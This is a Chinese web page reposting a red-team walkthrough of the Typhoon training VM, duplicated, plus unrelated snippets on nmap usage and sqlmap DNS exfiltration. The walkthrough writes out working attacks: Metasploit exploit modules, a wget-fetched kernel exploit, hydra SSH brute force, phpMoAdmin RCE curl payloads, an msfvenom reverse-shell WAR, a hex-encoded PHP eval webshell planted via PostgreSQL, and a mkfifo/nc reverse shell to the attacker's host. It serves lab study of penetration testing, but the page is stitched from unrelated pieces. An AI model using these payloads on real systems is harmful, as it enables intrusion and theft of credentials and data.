| 红队渗透测试之Typhoon | 您所在的位置:网站首页 › kali 永恒之蓝攻击 › 红队渗透测试之Typhoon |
红队渗透测试之Typhoon
|
导读信息收集渗透测试的本质就是信息收集,信息收集决定了你的攻击面的宽窄!1. nmap扫描网段2. nmap全端口扫描可以看到开放了非常多的端口3. web目录枚举这里我们使用dirb对目录进行爆破枚举dirb https://192.168.... Typhoon-v1.02 简介该项目是PrismaCSI作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web lications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.Typhoon虚拟机包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,利用后步骤,信息收集和DNS攻击。该项目有始有终会用到信息收集->通过信息收集到的各种思路进行getshell->获得getshell(十种方式)->内网信息枚举->提权,最终拿到flag.txt的过程,那么在这当中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。请注意:本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。下面首先使用nmap进行信息收集 1. nmap扫描网段由于本项目环境是nat模式需要项目IP地址,对IP网段进行全网段扫描 nmap 192.168.27.0/24 -sP进行namp全端口服务枚举 nmap -p- 192.168.27.128 -A可以看到开放了非常多的端口 nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb) 3. web目录枚举dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 这里我们使用dirb对目录进行爆破枚举 https://192.168.27.128/cms/ https://192.168.27.128/drupal/ https://192.168.27.128/phpmyadmin/ https://192.168.27.128/javascript/ https://192.168.27.128/robots.txt 通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件 攻击思路(一):drupal漏洞利用msfconsole使用msf进行漏洞利用 查找drupal模块 search drupal有很多漏洞,尝试使用最新的2018年的exp use exploit/unix/web/drupal_drupalgeddon2填写攻击ip地址 set rhosts 192.168.27.128这里注意扫描目录要修改一下 set TARGETURI /drupalrun拿到一个反弹shell 获取一个稳定shell 查看版本 uname -a直接查找3.13.0 searchsploit 3.13.0直接使用脚本 searchsploit -m linux/local/37292.c将exp复制到当前目录,并开启http服务,将exp到目标机器 python -m SimpleHTTPServer 8080wget https://192.168.27.187:8080/37292.c编译并命名为ylion,授予ylion权限并运行 gcc 37292.c -o ylionchmod +x ylion./ylion提权成功 成功拿到root权限! 攻击思路(二):SSH端口爆破发现端口22开放,其版本为openssh 6.6.1p1 利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条 OpenSSH 2.3 < 7.7 - Username Enumeration 可以直接使用这个poc脚本进行攻击 只要在search里面能找到的exp或者poc,在msf里面都是有的 search ssh/ssh_使用第六个 use auxiliary/scanner/ssh/ssh_enumusersoptions查看参数 修改为攻击ip 将爆破字典放到桌面的目录下 并且写入参数中,如下 由于是爆破,把线程调为20 set threads 20然后输入run开始运行 爆破完成,找到admin账户 使用九头蛇hydra对靶机的ssh进行爆破 hydra -l admin -P /root/Desktop/1/66/rockyou.txt 192.168.27.128 ssh用户名为:admin 密码为:metallica ssh [email protected]ssh远程登录成功 查看sudo -l情况 可以直接提权 sudo bash提权成功 攻击路径(三):phpMoAdminphpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。 从之前nmap扫描的数据可以看到如下 访问:https://192.168.27.128/robots.txt 访问/robots.txt,是一个mogondb的WebUI管理 访问https://192.168.27.128/mongoadmin/ 访问可能会有点慢 这是mongodb数据库的一个php写的管理工具phpmoadmin 后台存在信息泄露,对应可以去查找是否存在漏洞 点击change database https://192.168.27.128/mongoadmin/index.php?action=getStats 可以看到版本号是1.0.9,google查一下 phpMoAdmin 1.0.9 exploit 两个RCEcurl https://192.168.27.128/mongoadmin/index.php -d "object=1;system('whoami');//"curl 'https://192.168.27.128/mongoadmin/index.php?collection=admin&action=listRows&find=array();passthru("uname%20-a");exit;'比较卡,或者在界面多点击几次后等待会出现creds选项: https://192.168.27.128/mongoadmin/index.php?db=credentials&action=listRows&collection=creds 发现: [username] => typhoon [password] => 789456123 ssh [email protected]即可ssh远程登录 攻击路径(四):LotusCMS漏洞利用LotusCMS将最前沿的设计和设计集成到了最被忽视的CMS生态位之一-无数据库Web设计和开发中。 在之前爆破到的目录存在一个cms https://192.168.27.128/cms/ lcms是一个不需要数据库就可以支撑的框架 这里我们通过msf进行攻击 msfconsolesearch lcms找到一个低版本的exp use exploit/multi/http/lcms_php_execset rhosts 192.168.27.128set rport 80set uri /cms/使用该exp进行尝试,并且添加参数进去 成功拿到反弹shell Tomcat是一个应用服务器。他可以运行你按照J2EE中的Servlet规范编写好的Java程序。 简单的说它是一个Web网站的运行容器,把你写好的网站放进去就可以运行。 访问8080端口,是一个tomcat7的站点,直接点击manager 出现登录框,尝试使用默认账户登录 tomcat/tomcat 登录成功 exp使用msf进行攻击,首先查找tomcat相关 search tomcat这里可以使用这个上传的exp,并填写参数 use exploit/multi/http/tomcat_mgr_uploadset HttpUsername tomcatset HttpPassword tomcatset rhosts 192.168.27.128set rport 8080成功拿到反弹shell 后台部署首先生成一个war包木马 msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.27.187 LPORT=4455 -f war -o ylion.war在刚才登录成功的界面下滑 选择war包木马并Deploy 使用命令查看war包内部的恶意代码文件 7z l ylion.war开启nc监听4455端口 nc -vlp 4455访问 https://192.168.27.128:8080/ylion/tiehvcfkfc.jsp 拿到反弹shell 攻击路径(六):Shellshock漏洞利用Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。 以上截取自百度的文章中 Nikto 是一款开放源代码的、功能强大的 WEB 扫描评估软件,能对 web 服务器多种安全项目进行测试的扫描软件,去寻找已知有名的漏洞,能在230多种服务器上扫描出2600多种有潜在危险的文件、CGI 及其他问题,它可以扫描指定主机的 WEB 类型、主机名、特定目录、COOKIE、特定 CGI 漏洞、返回主机允许的 http 模式等等。 它也使用 LibWhiske 库,但通常比 Whisker 更新的更为频繁。Nikto 是网管安全人员必备的 WEB 审计工具之一。 Nikto 是 perl 语言开发的,其特点扫描全面,速度快。 这里我们使用nikto对站点进行扫描 nikto -h https://192.168.27.128Shellshock - CVE-2014-6271和CVE-2014-6278 - 是在 Linux 发行版中常用的Bash命令shell 中发现的一个严重漏洞。该漏洞允许攻击者在受影响的系统上运行任意命令,使用CGI环境的Web服务器会受影响。 CVE-2014-6271:https://www.cvedetails.com/cve/cve-2014-6271 cve-2014-6278:https://www.cvedetails.com/cve/cve-2014-6278 CGI环境变量:https://www.cgi101.com/book/ch3/text.html msfconsole使用msf进行漏洞利用,查找shellshock并填写参数 search shellshock使用这个exp use exploit/multi/http/apache_mod_cgi_bash_env_execset payload linux/x86/shell/reverse_tcpset lhost 192.168.27.187set rhosts 192.168.27.128set targeturi /cgi-bin/test.shrun成功拿到反弹shell 攻击路径(七):NFS漏洞利用NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间共享资源。在NFS的应用中,本地NFS的应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 需要知道对方挂载的目录是什么 进入挂载目录就可以共享信息 使用msf search nfs/typhoon [*] ---挂载了该目录 mkdir /tmp/typhoon创建一个/tmp/typhoon目录 mount -t nfs 192.168.27.128:/typhoon /tmp/typhoon将目标挂载的目录挂载到我们新建的目录下 查看目录下内容 PostgreSQL是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS) 用msf尝试爆破PostgreSQL数据库用户名密码 search postgrespostgres:postgres@template1 psql -h 192.168.27.128 -U postgrespostgres@template1一开始登录失败,尝试密码为postgres成功 列出目录 select pg_ls_dir('./');读取权限允许的文件 select pg_read_file('postgresql.conf',0,1000);读取/etc/passwd第一行 DROP TABLE if EXISTS MrLee;CREATE TABLE MrLee(t TEXT);COPY MrLee FROM '/etc/passwd';select * from MrLee limit 1 offset 0;直接读出所有数据 SELECT * FROM MrLee;按下Q退出当前页面! 利用数据库写文件 INSERT INTO MrLee(t) VALUES('hello,MrLee');COPY MrLee(t) TO '/tmp/MrLee';SELECT * FROM MrLee;读取发现: hello,MrLee (46 行记录) 显示里面有一句hello,MrLee,成功写入文件,并成功读取到源内容 创建OID,清空内容 SELECT lo_create(998);delete from pg_largeobject where loid=998;接下来就是写入木马使用hex---小葵 0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E 将id998的内容写到/var/www/html/shell.php内 https://192.168.27.128/shell.php 访问为空白页面 使用蚁剑连接 攻击路径(九):Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口) Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个软件,不少 IoT 设备也使用了 Samba。2017年5月24日 Samba 了 4.6.4 版本,修复了一个严重的远程代码执行漏洞,漏洞编号 CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。 漏洞利用条件: 服务端共享目录有访问权限。 需要对服务器上写一个恶意文件并知道该文件的物理路径。 影响版本: Samba 3.5+ script.shnc -vlp 8888./script.shrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.27.187 8888 >/tmp/f总结 通过以上的学习,我们认知了一些红队的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap全端口信息枚举、drupal漏洞利用、SSH端口爆破、phpMoAdmin利用、LotusCMS漏洞利用、Tomca漏洞利用、Shellshock漏洞利用、NSF漏洞利用、5432 PostgreSQL漏洞利用、Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口)、25端口DNS漏洞利用-区域攻击等等,希望伙伴们能实际操作复现一遍,不要眼高手低!巩固自身的渗透技术和技巧! 最后 希望大家提高安全意识,没有网络安全就没有国家安全!Typhoon-v1.02 简介 该项目是PrismaCSI作者精心制作的项目环境,目标是获取获得root权限并找到flag.txt文本信息,该项目作为OSCP考试培训必打的一个项目环境,该作者评定该环境为渗透中级水准难度。接下来不管是零基础学习渗透者,还是有些基础的渗透者,甚至是高水平的渗透人员读该的技巧和文章都能学习到一些红队知识。 Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web lications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon. Typhoon虚拟机包含多个漏洞和配置错误。Typhoon可用于测试网络服务中的漏洞,配置错误,易受攻击的Web应用程序,密码破解攻击,权限提升攻击,利用后步骤,信息收集和DNS攻击。 该项目有始有终会用到信息收集->通过信息收集到的各种思路进行getshell->获得getshell(十种方式)->内网信息枚举->提权,最终拿到flag.txt的过程,那么在这当中用到了一些小技巧都会在文章中演示出来,希望大家能动手也来和我一起学习渗透。 请注意: 本文仅用于技术讨论与研究,对于所有笔记中复现的这些终端或者服务器,都是自行搭建的环境进行渗透的。我将使用Kali Linux作为此次学习的攻击者机器。这里使用的技术仅用于学习教育目的,如果列出的技术用于其他任何目标,本站及作者概不负责。 渗透测试的本质就是信息收集,信息收集决定了你的攻击面的宽窄! 下面首先使用nmap进行信息收集 1. nmap扫描网段由于本项目环境是nat模式需要项目IP地址,对IP网段进行全网段扫描 nmap 192.168.27.0/24 -sP进行namp全端口服务枚举 nmap -p- 192.168.27.128 -A可以看到开放了非常多的端口 nmap输出显示各种开放端口:21(ftp,可以匿名访问的)、22(ssh)、25(smtp)、53(domain)、80(http)、110(pop3)、111(rpcbind)、139(netbios-ssn)、 143(imap)、445(netbios-ssn)、631(ipp)、993(ssl/imaps)、995(ssl/pop3)、2049(nfs_acl)、3306(mysql)、5432(postgrespl)、8080(http) 、6379(redis)、27017(mongodb) 3. web目录枚举dirb是一个基于字典的web目录扫描工具,查找现有的(和/或隐藏的)Web对象,通过对Web服务器发起基于字典的攻击并分析响应的数据。 采用递归的方式来获取更多的目录,它还支持代理和http认证限制访问的网站,是在信息收集阶段获取目标信息常用工具手段。 这里我们使用dirb对目录进行爆破枚举 https://192.168.27.128/cms/ https://192.168.27.128/drupal/ https://192.168.27.128/phpmyadmin/ https://192.168.27.128/javascript/ https://192.168.27.128/robots.txt 通过dirb对目标网站进行扫描发现存在phpmyadmin以及robots.txt和drupal,cms等目录文件 攻击思路(一):drupal漏洞利用msfconsole使用msf进行漏洞利用 查找drupal模块 search drupal有很多漏洞,尝试使用最新的2018年的exp use exploit/unix/web/drupal_drupalgeddon2填写攻击ip地址 set rhosts 192.168.27.128这里注意扫描目录要修改一下 set TARGETURI /drupalrun拿到一个反弹shell 获取一个稳定shell 查看版本 uname -a直接查找3.13.0 searchsploit 3.13.0直接使用脚本 searchsploit -m linux/local/37292.c将exp复制到当前目录,并开启http服务,将exp到目标机器 python -m SimpleHTTPServer 8080wget https://192.168.27.187:8080/37292.c编译并命名为ylion,授予ylion权限并运行 gcc 37292.c -o ylionchmod +x ylion./ylion提权成功 成功拿到root权限! 攻击思路(二):SSH端口爆破发现端口22开放,其版本为openssh 6.6.1p1 利用OpenSSH新爆出的CVE爆出目标主机的用户,这对特定的用户爆破密码,建议爆破1000条 OpenSSH 2.3 < 7.7 - Username Enumeration 可以直接使用这个poc脚本进行攻击 只要在search里面能找到的exp或者poc,在msf里面都是有的 search ssh/ssh_使用第六个 use auxiliary/scanner/ssh/ssh_enumusersoptions查看参数 修改为攻击ip 将爆破字典放到桌面的目录下 并且写入参数中,如下 由于是爆破,把线程调为20 set threads 20然后输入run开始运行 爆破完成,找到admin账户 使用九头蛇hydra对靶机的ssh进行爆破 hydra -l admin -P /root/Desktop/1/66/rockyou.txt 192.168.27.128 ssh用户名为:admin 密码为:metallica ssh [email protected]ssh远程登录成功 查看sudo -l情况 可以直接提权 sudo bash提权成功 攻击路径(三):phpMoAdminphpMoAdmin 是一个用PHP 开发的在线MongoDB 管理工具,可用于创建、删除和修改数据库和索引,提供视和数据搜索工具,提供数据库启动时间和内存的统计,支持JSON 格式数据的导入导出。 从之前nmap扫描的数据可以看到如下 访问:https://192.168.27.128/robots.txt 访问/robots.txt,是一个mogondb的WebUI管理 访问https://192.168.27.128/mongoadmin/ 访问可能会有点慢 这是mongodb数据库的一个php写的管理工具phpmoadmin 后台存在信息泄露,对应可以去查找是否存在漏洞 点击change database https://192.168.27.128/mongoadmin/index.php?action=getStats 可以看到版本号是1.0.9,google查一下 phpMoAdmin 1.0.9 exploit 两个RCEcurl https://192.168.27.128/mongoadmin/index.php -d "object=1;system('whoami');//"curl 'https://192.168.27.128/mongoadmin/index.php?collection=admin&action=listRows&find=array();passthru("uname%20-a");exit;'比较卡,或者在界面多点击几次后等待会出现creds选项: https://192.168.27.128/mongoadmin/index.php?db=credentials&action=listRows&collection=creds 发现: [username] => typhoon [password] => 789456123 ssh [email protected]即可ssh远程登录 攻击路径(四):LotusCMS漏洞利用LotusCMS将最前沿的设计和设计集成到了最被忽视的CMS生态位之一-无数据库Web设计和开发中。 在之前爆破到的目录存在一个cms https://192.168.27.128/cms/ lcms是一个不需要数据库就可以支撑的框架 这里我们通过msf进行攻击 msfconsolesearch lcms找到一个低版本的exp use exploit/multi/http/lcms_php_execset rhosts 192.168.27.128set rport 80set uri /cms/使用该exp进行尝试,并且添加参数进去 成功拿到反弹shell Tomcat是一个应用服务器。他可以运行你按照J2EE中的Servlet规范编写好的Java程序。 简单的说它是一个Web网站的运行容器,把你写好的网站放进去就可以运行。 访问8080端口,是一个tomcat7的站点,直接点击manager 出现登录框,尝试使用默认账户登录 tomcat/tomcat 登录成功 exp使用msf进行攻击,首先查找tomcat相关 search tomcat这里可以使用这个上传的exp,并填写参数 use exploit/multi/http/tomcat_mgr_uploadset HttpUsername tomcatset HttpPassword tomcatset rhosts 192.168.27.128set rport 8080成功拿到反弹shell 后台部署首先生成一个war包木马 msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.27.187 LPORT=4455 -f war -o ylion.war在刚才登录成功的界面下滑 选择war包木马并Deploy 使用命令查看war包内部的恶意代码文件 7z l ylion.war开启nc监听4455端口 nc -vlp 4455访问 https://192.168.27.128:8080/ylion/tiehvcfkfc.jsp 拿到反弹shell 攻击路径(六):Shellshock漏洞利用Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。 以上截取自百度的文章中 Nikto 是一款开放源代码的、功能强大的 WEB 扫描评估软件,能对 web 服务器多种安全项目进行测试的扫描软件,去寻找已知有名的漏洞,能在230多种服务器上扫描出2600多种有潜在危险的文件、CGI 及其他问题,它可以扫描指定主机的 WEB 类型、主机名、特定目录、COOKIE、特定 CGI 漏洞、返回主机允许的 http 模式等等。 它也使用 LibWhiske 库,但通常比 Whisker 更新的更为频繁。Nikto 是网管安全人员必备的 WEB 审计工具之一。 Nikto 是 perl 语言开发的,其特点扫描全面,速度快。 这里我们使用nikto对站点进行扫描 nikto -h https://192.168.27.128Shellshock - CVE-2014-6271和CVE-2014-6278 - 是在 Linux 发行版中常用的Bash命令shell 中发现的一个严重漏洞。该漏洞允许攻击者在受影响的系统上运行任意命令,使用CGI环境的Web服务器会受影响。 CVE-2014-6271:https://www.cvedetails.com/cve/cve-2014-6271 cve-2014-6278:https://www.cvedetails.com/cve/cve-2014-6278 CGI环境变量:https://www.cgi101.com/book/ch3/text.html msfconsole使用msf进行漏洞利用,查找shellshock并填写参数 search shellshock使用这个exp use exploit/multi/http/apache_mod_cgi_bash_env_execset payload linux/x86/shell/reverse_tcpset lhost 192.168.27.187set rhosts 192.168.27.128set targeturi /cgi-bin/test.shrun成功拿到反弹shell 攻击路径(七):NFS漏洞利用NFS(Network File System)即网络文件系统,是FreeBSD支持的文件系统中的一种,它允许网络中的计算机之间共享资源。在NFS的应用中,本地NFS的应用可以透明地读写位于远端NFS服务器上的文件,就像访问本地文件一样。 需要知道对方挂载的目录是什么 进入挂载目录就可以共享信息 使用msf search nfs/typhoon [*] ---挂载了该目录 mkdir /tmp/typhoon创建一个/tmp/typhoon目录 mount -t nfs 192.168.27.128:/typhoon /tmp/typhoon将目标挂载的目录挂载到我们新建的目录下 查看目录下内容 PostgreSQL是一个功能非常强大的、源代码开放的客户/服务器关系型数据库管理系统(RDBMS) 用msf尝试爆破PostgreSQL数据库用户名密码 search postgrespostgres:postgres@template1 psql -h 192.168.27.128 -U postgrespostgres@template1一开始登录失败,尝试密码为postgres成功 列出目录 select pg_ls_dir('./');读取权限允许的文件 select pg_read_file('postgresql.conf',0,1000);读取/etc/passwd第一行 DROP TABLE if EXISTS MrLee;CREATE TABLE MrLee(t TEXT);COPY MrLee FROM '/etc/passwd';select * from MrLee limit 1 offset 0;直接读出所有数据 SELECT * FROM MrLee;按下Q退出当前页面! 利用数据库写文件 INSERT INTO MrLee(t) VALUES('hello,MrLee');COPY MrLee(t) TO '/tmp/MrLee';SELECT * FROM MrLee;读取发现: hello,MrLee (46 行记录) 显示里面有一句hello,MrLee,成功写入文件,并成功读取到源内容 创建OID,清空内容 SELECT lo_create(998);delete from pg_largeobject where loid=998;接下来就是写入木马使用hex---小葵 0x3C3F70687020406576616C28245F504F53545B27313233275D293B3F3E 将id998的内容写到/var/www/html/shell.php内 https://192.168.27.128/shell.php 访问为空白页面 使用蚁剑连接 攻击路径(九):Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口) Samba 是在 Linux 和 UNIX 系统上实现 SMB 协议的一个软件,不少 IoT 设备也使用了 Samba。2017年5月24日 Samba 了 4.6.4 版本,修复了一个严重的远程代码执行漏洞,漏洞编号 CVE-2017-7494,攻击者可以利用该漏洞在目标服务器上执行任意代码。 漏洞利用条件: 服务端共享目录有访问权限。 需要对服务器上写一个恶意文件并知道该文件的物理路径。 影响版本: Samba 3.5+ script.shnc -vlp 8888./script.shrm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.27.187 8888 >/tmp/f总结 通过以上的学习,我们认知了一些红队的小技巧的技术手段,完成了从信息收集到内核提权项目落地,学习到了非常多的技巧,例如nmap全端口信息枚举、drupal漏洞利用、SSH端口爆破、phpMoAdmin利用、LotusCMS漏洞利用、Tomca漏洞利用、Shellshock漏洞利用、NSF漏洞利用、5432 PostgreSQL漏洞利用、Samba远程代码执行漏洞(CVE-2017-7494)Linux版永恒之蓝 445端口(139端口)、25端口DNS漏洞利用-区域攻击等等,希望伙伴们能实际操作复现一遍,不要眼高手低!巩固自身的渗透技术和技巧! 最后 希望大家提高安全意识,没有网络安全就没有国家安全! 4.4 查看打开的端口对一个大范围的网络或活跃的主机进行渗透测试,必须要了解这些主机上所打开的端口号。在Kali Linux中默认提供了Nmap和Zenmap两个扫描端口工具。为了访问目标系统中打开的TCP和UDP端口,本节将介绍Nmap和Zenmap工具的使用。 4.4.1 TCP端口扫描工具Nmap 使用Nmap工具查看目标主机192.168.41.136上开放的端口号。执行命令如下所示: root@kali:~# nmap 192.168.41.136 Starting Nmap 6.40 ( https://nmap.org ) at 2014-04-19 16:21 CST Nmap scan report for www.benet.com (192.168.41.136) Host is up (0.00022s latency). Not shown: 996 closed ports PORT STATE SERVICE 21/tcp open ftp 22/tcp open ssh 23/tcp open telnet 25/tcp opne smtp 53/tcp open domain 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 445/tcp open microsoft-ds 512/tcp open exec 513/tcp open login 514/tcp open shell 1099/tcp open rmiregistry 1524/tcp open ingreslock 2049/tcp open nfs 2121/tcp open ccproxy-ftp 3306/tcp open mysql 5432/tcp open postgresql 5900/tcp open vnc 6000/tcp open X11 6667/tcp open irc 8009/tcp open ajp13 8180/tcp open unknown MAC Address: 00:0C:29:31:02:17 (VMware) Nmap done: 1 IP address (1 host up) scanned in 0.28 seconds输出的信息显示了主机192.168.41.136上开放的所有端口,如22、53、80和111等。1. 指定扫描端口范围如果目标主机上打开的端口较多时,用户查看起来可能有点困难。这时候用户可以使用Nmap指定扫描的端口范围,如指定扫描端口号在1~1000之间的端口号,执行命令如下所示:root@kali:~# nmap -p 1-1000 192.168.41.136Starting Nmap 6.40 ( https://nmap.org ) at 2014-04-19 16:27 CSTNmap scan report for www.benet.com (192.168.41.136)Host is up (0.00020s latency).Not shown: 49 closed portsPORT STATE SERVICE21/tcp open ftp22/tcp open ssh23/tcp open telnet25/tcp opne smtp53/tcp open domain80/tcp open http111/tcp open rpcbind139/tcp open netbios-ssn445/tcp open microsoft-ds512/tcp open exec513/tcp open login514/tcp open shellMAC Address: 00:0C:29:31:02:17 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.35 seconds输出的信息显示了主机192.168.41.136上端口在1~1000之间所开放的端口号。2. 扫描特定端口Nmap工具还可以指定一个特定端口号来扫描。【实例4-2】使用Nmap工具指定扫描在192.168.41.*网段内所有开启TCP端口22的主机。执行命令如下所示:root@kali:~# nmap -p 22 192.168.41.*Starting Nmap 6.40 ( https://nmap.org ) at 2014-04-21 09:44 CSTNmap scan report for 192.168.41.1Host is up (0.00029s latency).PORT STATE SERVICE22/tcp closed sshMAC Address: 00:50:56:C0:00:08 (VMware)Nmap scan report for 192.168.41.2Host is up (0.00032s latency).PORT STATE SERVICE22/tcp closed sshMAC Address: 00:50:56:E9:AF:47 (VMware)Nmap scan report for www.benet.com (192.168.41.136)Host is up (0.00056s latency).PORT STATE SERVICE22/tcp open sshMAC Address: 00:0C:29:31:02:17 (VMware)Nmap scan report for 192.168.41.254Host is up (0.00027s latency).PORT STATE SERVICE22/tcp filtered sshMAC Address: 00:50:56:E1:5E:75 (VMware)Nmap scan report for 192.168.41.234Host is up (0.000052s latency).PORT STATE SERVICE22/tcp open sshNmap done: 256 IP addresses (5 hosts up) scanned in 2.81 seconds输出的结果显示了192.168.41.*网段内所有开启22端口的主机信息。从输出的信息中可以看到,总共有五台主机上打开了22号端口。使用Nmap工具还可以指定扫描端口22结果的输出格式。执行命令如下所示:root@kali:~# nmap -p 22 192.168.41.* -oG /tmp/nmap-targethost-tcp445.txt执行以上命令后输出的信息与第三步中输出的结果类似,这里就不再列举。但是执行该命令后,Nmap会将输出的信息保存到/tmp/ nmap-targethost-tcp445.txt文件中。4.4.2 形化TCP端口扫描工具ZenmapZenmap是Nmap官方推出的一款基于Nmap的安全扫描形用户界面。它的设计目标是快速地扫描大型网络,当然也可以使用它扫描单个主机。下面将介绍Zenmap工具的使用。启动Zenmap工具。在Kali形界面依次选择“应用程序”|Kali Linux|“信息收集”|“DNS分析”|Zenmap命令,将打开如4.2所示的界面。4.2 Zenmap起始界面 在该界面Target文本框中输入目标主机地址,在Profile文本框中选择扫描类型。设置完后,单击Scan按钮,扫描结果如4.3所示。4.3 扫描界面 该界面显示了扫描192.168.41.*网段内所有主机启动的所有端口信息。在左侧栏中可以切换以主机或服务的形式分别显示详细扫描结果。在右侧栏中,可以分别查看Namp输出信息、端口/主机、拓扑结构、主机详细信息和扫描信息等。 SQLMAP _DNS注入配置方法网上针对sqlmap进行dns注入的相关文章太少,只是简单介绍了下–dns-domain参数,相关的实战文章要么就模糊或者一笔带过,。然后参考网上的方法重新整理了一遍,简单理解。需要准备的东西,sqlmap、windows盲注一个、两个域名、一台外网服务器。中的352E362E3134就是执行version()后返回的结果。 解码获取到mysql的版本。好了至此这个点进行dns注入是没毛病的。 准备配置域名2个,网上有些文章说一个也行,但是总感觉较为麻烦,很多域名服务器商也并未提供某些高级功能,所以还是准备两个的简单些。 www.a.comwww.b.com首先我们来配置域名a-> a.com 只需要添加*进行泛解析指向我们的外网服务器的ip就可以了。 在来配置我们的域名b->b.com 这个就更简单了,直接修改域名的dns,就填入ns1.a.com ns2.a.com 就行了其他的都不用搞,照着填写就行了。 然后等待域名生效。我们在到外网服务器上来测试下看是否解析成功 服务器上开始监听53端口 然后本机ping hello.b.com 在外网服务器上发我们已经能接受到hello.b.com的请求,并且本机提示是找不到主机不用管,因为我们没有设置解析。已经都配置完毕我们使用sqlmap进行dns注入即可。 Sqlmap中加入参数–dns-domain=b.com --hex即可 来到这一步sqlmap会卡住提示设置DNS服务器实例 直接ctrl+c 提示通过DNS通道的数据检索成功。 注入的速度就跟报错和联合一样快了,再也不用忍受龟速了。 提问者:月却足沓→车 测试53端口 |
【本文地址】